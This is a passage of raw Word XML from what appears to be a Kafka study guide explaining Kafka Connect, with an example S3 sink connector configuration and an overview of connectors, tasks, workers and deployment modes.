          <w:numId w:val="143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ncrementing.column.name</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the column to track new records (e.g., id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0DA4F3" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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topic.prefix</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A prefix to add to Kafka topics. In this case, all data from the MySQL database will be written to Kafka topics starting with mysql-.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DE108" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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eploy the Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142ED92F" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Use the Kafka Connect REST API to deploy this configuration. Once deployed, the connector will start reading data from the mydb MySQL database and pushing it to Kafka topics prefixed with mysql-.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E9B6A" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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Example: Kafka Connect Sink Connector (To Write Data to S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD2C51"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Similarly, we can use Kafka Connect to stream data from Kafka topics to Amazon S3 by using the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S3 Sink Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89EE1A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42802AA5"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name": "s3-sink-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0D58E"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D8BB8"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nector.class": "io.confluent.connect.s3.S3SinkConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25D13C"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8B7E5"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topics": "my-kafka-topic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13C8E0"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s3.bucket.name": "my-s3-bucket",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DF670"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s3.region": "us-west-2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B42851"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value.converter": "org.apache.kafka.connect.storage.StringConverter",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B6831"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flush.size": "10000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459058D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636E5B0"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43166741" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nector.class</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the connector class (S3SinkConnector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D840C0B" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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3.bucket.name</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the S3 bucket name where the data will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCEDD42" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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flush.size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines the number of records to accumulate before flushing data to S3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B0FF4" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177001D3" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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Connect is a powerful framework that simplifies the integration of Kafka with external systems. It offers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02AAA2" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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calability</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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by running in distributed mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458DE6B" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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A wide range of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pre-built connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for popular systems (databases, cloud storage, file systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40599958" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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he ability to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming and batch data processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a reliable and fault-tolerant way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CA314" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Connect abstracts much of the complexity involved in building custom integration solutions, making it easier to integrate Kafka with external systems for real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3566B2" w14:textId="346E2060"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3853254">
          <v:rect id="_x0000_i3178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1BA7D" w14:textId="69916CBC" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="795" w:name="_Toc196308275"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Discuss Kafka Connect and how it allows for easy integration between Kafka and external systems (e.g., databases, HDFS, and external message queues)</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="795"/>
    </w:p>
    <w:p w14:paraId="041814A9" w14:textId="369398A4" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Connect: Easy Integration Between Kafka and External Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD598F"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afka Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a robust, scalable, and fault-tolerant framework that enables easy integration between </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a variety of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>external systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as databases, file systems (e.g., HDFS), cloud storage, external message queues, and other systems. Kafka Connect is a part of the Apache Kafka ecosystem and helps move large amounts of data in and out of Kafka with minimal effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C18557" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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ey Features of Kafka Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03250B8A" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Connect can scale horizontally by running multiple worker nodes, either in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standalone mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (single node) or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (multiple nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3851B3" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Connect provides a fault-tolerant mechanism by replicating data across different workers, ensuring that the system remains operational even in the event of a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA30C14" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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luggable Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Connect uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to integrate Kafka with external systems. These connectors can be easily plugged into Kafka Connect, and custom connectors can be developed for new systems or custom use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00135A20" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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High Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Connect is designed to handle high throughput, enabling it to deal with large-scale data transfers without overwhelming the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01751EAC" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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ST API</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Connect exposes a REST API that allows users to manage connectors, configurations, and tasks without direct interaction with the underlying code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052663F0" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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 Connect Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD498D7" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These are responsible for connecting Kafka to external systems. There are two types of connectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F84428" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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ource Connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pull data from external systems (e.g., a database) into Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BBA90" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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ink Connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Push data from Kafka topics to external systems (e.g., databases, HDFS, message queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F110A7F" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each connector can spawn one or more tasks. A task is the unit of work that handles a specific partition of the data. Kafka Connect can scale by distributing these tasks across multiple workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC57FF" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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Workers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Connect workers run connectors and tasks. They can run in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09588B69" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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tandalone Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For simple, single-node setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8F058" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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istributed Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For large-scale, multi-node setups. This mode allows tasks to be distributed across multiple workers for better scalability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17593876" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Connect uses JSON configuration files to specify settings like connection details, task distribution, and data formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D7CE33" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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 Connect Use Cases and Integration Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E515E"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Connect enables integration with various external systems, including databases, file systems, cloud services, and message queues. Below are a few examples of how Kafka Connect can be used for easy integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5470FF" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620"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1. Integrating Kafka with Databases (e.g., MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FA534"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Connect provides JDBC-based </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Source</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Sink</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> connectors to stream data from databases into Kafka topics and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F18911" w14:textId="77777777" w:rsidR="00105620" w:rsidRPr="0003272F" w:rsidRDefault="00105620" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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ource Connector (Database to Kafka)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
